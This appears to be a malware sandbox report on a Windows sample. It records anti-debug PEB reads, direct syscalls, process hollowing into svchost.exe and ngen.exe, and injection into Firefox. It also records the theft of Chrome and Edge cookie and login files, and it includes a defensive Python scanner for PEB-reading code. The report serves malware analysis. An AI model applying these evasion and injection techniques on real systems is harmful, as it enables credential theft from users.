            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588208A mov eax, dword ptr fs:[00000030h]4_2_0588208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587D08D mov eax, dword ptr fs:[00000030h]4_2_0587D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B909C mov eax, dword ptr fs:[00000030h]4_2_058B909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h]4_2_058AD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h]4_2_058AD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05885096 mov eax, dword ptr fs:[00000030h]4_2_05885096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059460B8 mov eax, dword ptr fs:[00000030h]4_2_059460B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059460B8 mov ecx, dword ptr fs:[00000030h]4_2_059460B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059550D9 mov eax, dword ptr fs:[00000030h]4_2_059550D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059020DE mov eax, dword ptr fs:[00000030h]4_2_059020DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h]4_2_058FD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h]4_2_058FD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A90DB mov eax, dword ptr fs:[00000030h]4_2_058A90DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058880E9 mov eax, dword ptr fs:[00000030h]4_2_058880E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0587A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A50E4 mov eax, dword ptr fs:[00000030h]4_2_058A50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A50E4 mov ecx, dword ptr fs:[00000030h]4_2_058A50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C0F0 mov eax, dword ptr fs:[00000030h]4_2_0587C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C20F0 mov ecx, dword ptr fs:[00000030h]4_2_058C20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587A020 mov eax, dword ptr fs:[00000030h]4_2_0587A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C020 mov eax, dword ptr fs:[00000030h]4_2_0587C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592705E mov ebx, dword ptr fs:[00000030h]4_2_0592705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592705E mov eax, dword ptr fs:[00000030h]4_2_0592705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05882050 mov eax, dword ptr fs:[00000030h]4_2_05882050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AB052 mov eax, dword ptr fs:[00000030h]4_2_058AB052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05955060 mov eax, dword ptr fs:[00000030h]4_2_05955060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov ecx, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AC073 mov eax, dword ptr fs:[00000030h]4_2_058AC073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590106E mov eax, dword ptr fs:[00000030h]4_2_0590106E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD070 mov ecx, dword ptr fs:[00000030h]4_2_058FD070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A438F mov eax, dword ptr fs:[00000030h]4_2_058A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A438F mov eax, dword ptr fs:[00000030h]4_2_058A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595539D mov eax, dword ptr fs:[00000030h]4_2_0595539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h]4_2_0587E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h]4_2_0587E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h]4_2_0587E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05878397 mov eax, dword ptr fs:[00000030h]4_2_05878397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05878397 mov eax, dword ptr fs:[00000030h]4_2_05878397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05878397 mov eax, dword ptr fs:[00000030h]4_2_05878397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D739A mov eax, dword ptr fs:[00000030h]4_2_058D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D739A mov eax, dword ptr fs:[00000030h]4_2_058D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B33A0 mov eax, dword ptr fs:[00000030h]4_2_058B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B33A0 mov eax, dword ptr fs:[00000030h]4_2_058B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A33A5 mov eax, dword ptr fs:[00000030h]4_2_058A33A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593B3D0 mov ecx, dword ptr fs:[00000030h]4_2_0593B3D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h]4_2_0588A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h]4_2_0588A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h]4_2_0588A3C0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658557D00 RtlAddVectoredExceptionHandler,RaiseFailFastException,0_2_00007FF658557D00
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585B0E9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6585B0E9C
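            Each PEB entry above is one "mov <reg>, dword ptr fs:[30h]": in a 32-bit process FS points at the TEB, TEB+0x30 holds the PEB pointer, and anti-debug code then typically reads PEB.BeingDebugged (+0x02) or PEB.NtGlobalFlag (+0x68) through it. The Python below is an added example, not code from the report or from the sandbox: a byte-level scanner that finds those FS-relative loads in a 32-bit code blob, names the TEB field addressed, and classifies the immediate follow-up access. The sample bytes are a hand-assembled prologue constructed for this example, not bytes from the malware; the field names and follow-up patterns are this example's own choices, and a hit that lands inside data rather than code is possible and is not ruled out.

```python
"""Scan a 32-bit x86 code blob for 'mov r32, dword ptr fs:[imm32]', the
instruction behind the sandbox's "reads the PEB" listing, and classify what the
code does with the pointer next. Fixed-length byte matching; no disassembler."""
from __future__ import annotations

import struct
from dataclasses import dataclass
from typing import Optional

# ModRM register numbers for the destinations handled here (esp/ebp left out:
# they need a SIB byte or a different mod encoding in the follow-up patterns).
REG_NAMES = {0: "eax", 1: "ecx", 2: "edx", 3: "ebx", 6: "esi", 7: "edi"}
# Offsets from the FS base (the TEB in a 32-bit Windows process).
TEB_FIELDS = {0x18: "TEB.Self", 0x30: "TEB.ProcessEnvironmentBlock"}


@dataclass
class TebRead:
    offset: int                # byte offset of the FS-prefixed instruction
    length: int                # 6 for the 'A1' form, 7 for the '8B /r' form
    register: str              # destination register
    teb_offset: int            # displacement from the FS base
    field: str                 # known TEB field, or "unknown"
    follow_up: Optional[str]   # recognised use of the pointer, if any


def _follow_up(code: bytes, pos: int, reg: int) -> Optional[str]:
    """Match the PEB field reads anti-debug code typically emits right after."""
    modrm = 0x40 | reg  # mod=01 (disp8), reg field=eax, rm=<reg>
    patterns = {
        bytes([0x0F, 0xB6, modrm, 0x02]): "PEB.BeingDebugged (movzx eax, byte [reg+2])",
        bytes([0x80, 0x78 | reg, 0x02, 0x00]): "PEB.BeingDebugged (cmp byte [reg+2], 0)",
        bytes([0x8B, modrm, 0x68]): "PEB.NtGlobalFlag (mov eax, [reg+0x68])",
        bytes([0x8B, modrm, 0x0C]): "PEB.Ldr (mov eax, [reg+0x0c])",
    }
    for pat, name in patterns.items():
        if code.startswith(pat, pos):
            return name
    return None


def find_teb_reads(code: bytes) -> list[TebRead]:
    """Return every FS-relative 32-bit load found in the blob, in order."""
    hits: list[TebRead] = []
    i = 0
    while i + 6 <= len(code):
        reg = length = None
        if code[i] == 0x64 and code[i + 1] == 0xA1:            # 64 A1 disp32: mov eax, fs:[disp32]
            reg, disp_at, length = 0, i + 2, 6
        elif (code[i] == 0x64 and code[i + 1] == 0x8B
              and (code[i + 2] & 0xC7) == 0x05 and i + 7 <= len(code)):  # 64 8B /r disp32
            reg, disp_at, length = (code[i + 2] >> 3) & 7, i + 3, 7
        if reg is None or reg not in REG_NAMES:
            i += 1
            continue
        disp = struct.unpack_from("<I", code, disp_at)[0]
        hits.append(TebRead(i, length, REG_NAMES[reg], disp,
                            TEB_FIELDS.get(disp, "unknown"), _follow_up(code, i + length, reg)))
        i += length
    return hits


def peb_read_counts(code: bytes) -> dict[str, int]:
    """Per-register count of PEB-pointer reads, the shape of the sandbox listing."""
    counts: dict[str, int] = {}
    for r in find_teb_reads(code):
        if r.teb_offset == 0x30:
            counts[r.register] = counts.get(r.register, 0) + 1
    return counts


# Constructed sample, not bytes from the malware: a small anti-debug prologue
# assembled by hand so the scanner has known ground truth to find.
SAMPLE = bytes.fromhex(
    "55 8b ec"                # push ebp; mov ebp, esp
    "64 a1 30 00 00 00"       # mov eax, dword ptr fs:[30h]    ; PEB pointer
    "0f b6 40 02"             # movzx eax, byte ptr [eax+2]    ; PEB.BeingDebugged
    "85 c0"                   # test eax, eax
    "75 10"                   # jnz short +0x10
    "64 8b 0d 30 00 00 00"    # mov ecx, dword ptr fs:[30h]    ; PEB pointer again
    "8b 41 68"                # mov eax, dword ptr [ecx+68h]   ; PEB.NtGlobalFlag
    "64 a1 18 00 00 00"       # mov eax, dword ptr fs:[18h]    ; TEB self pointer
    "5d c3"                   # pop ebp; ret
)

if __name__ == "__main__":
    for hit in find_teb_reads(SAMPLE):
        print(f"+{hit.offset:#06x}  mov {hit.register}, fs:[{hit.teb_offset:#x}]  "
              f"{hit.field}  -> {hit.follow_up}")
    print(peb_read_counts(SAMPLE))
```

            Run against the unpacked 4.2.ngen.exe.400000.0.unpack image, peb_read_counts() reproduces the per-register tallies in the listing; the follow-up classification is what separates a benign PEB read (e.g. walking PEB.Ldr for exports) from a debugger check.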

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\GJRX21GBj3.exe
              Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write
              Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
              Direct syscalls recorded by the sandbox (native API name and the address the call was issued from), in the order listed:
              NtAllocateVirtualMemory: Direct from: 0x76EF48EC
              NtQueryAttributesFile: Direct from: 0x76EF2E6C
              NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
              NtQuerySystemInformation: Direct from: 0x76EF48CC
              NtOpenSection: Direct from: 0x76EF2E0C
              NtDeviceIoControlFile: Direct from: 0x76EF2AEC
              NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
              NtQueryInformationToken: Direct from: 0x76EF2CAC
              NtCreateFile: Direct from: 0x76EF2FEC
              NtOpenFile: Direct from: 0x76EF2DCC
              NtTerminateThread: Direct from: 0x76EF2FCC
              NtOpenKeyEx: Direct from: 0x76EF2B9C
              NtSetInformationProcess: Direct from: 0x76EF2C5C
              NtProtectVirtualMemory: Direct from: 0x76EF2F9C
              NtWriteVirtualMemory: Direct from: 0x76EF2E3C
              NtNotifyChangeKey: Direct from: 0x76EF3C2C
              NtCreateMutant: Direct from: 0x76EF35CC
              NtResumeThread: Direct from: 0x76EF36AC
              NtMapViewOfSection: Direct from: 0x76EF2D1C
              NtProtectVirtualMemory: Direct from: 0x76EE7B2E
              NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
              NtQuerySystemInformation: Direct from: 0x76EF2DFC
              NtReadFile: Direct from: 0x76EF2ADC
              NtDelayExecution: Direct from: 0x76EF2DDC
              NtQueryInformationProcess: Direct from: 0x76EF2C26
              NtResumeThread: Direct from: 0x76EF2FBC
              NtCreateUserProcess: Direct from: 0x76EF371C
              NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
              NtWriteVirtualMemory: Direct from: 0x76EF490C
              NtSetInformationThread: Direct from: 0x76EE63F9
              NtClose: Direct from: 0x76EF2B6C
              NtSetInformationThread: Direct from: 0x76EF2B4C
              NtReadVirtualMemory: Direct from: 0x76EF2E8C
              NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\GJRX21GBj3.exe
              Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A (4D5A is "MZ": a PE image is being written at the target's image base)
              Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
              Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and write
              Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\findstr.exe
              Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: read write
              Section loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and write
              Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Thread register set: target process: 5328
              Thread APC queued: target process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
            Source: C:\Users\user\Desktop\GJRX21GBj3.exe
              Memory written: C:\Windows\System32\svchost.exe base: 400000
              Memory written: C:\Windows\System32\svchost.exe base: 401000
              Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000
              Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000
              Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 5084008
              Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
              Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
              Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Windows\SysWOW64\findstr.exe
              Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmp
              Binary or memory string: Program Manager
              Binary or memory string: Shell_TrayWnd
              Binary or memory string: Progman
              Binary or memory string: Progmanlock
              ("Program Manager" and "Progman" are the title and window class of the Explorer desktop window; "Shell_TrayWnd" is the taskbar's window class)
            Source: C:\Users\user\Desktop\GJRX21GBj3.exe
              Code function: 0_2_00007FF6585B1544 cpuid
              Code function: 0_2_00007FF6585B11A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

            Stealing of Sensitive Information

Source: Yara match | File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\findstr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
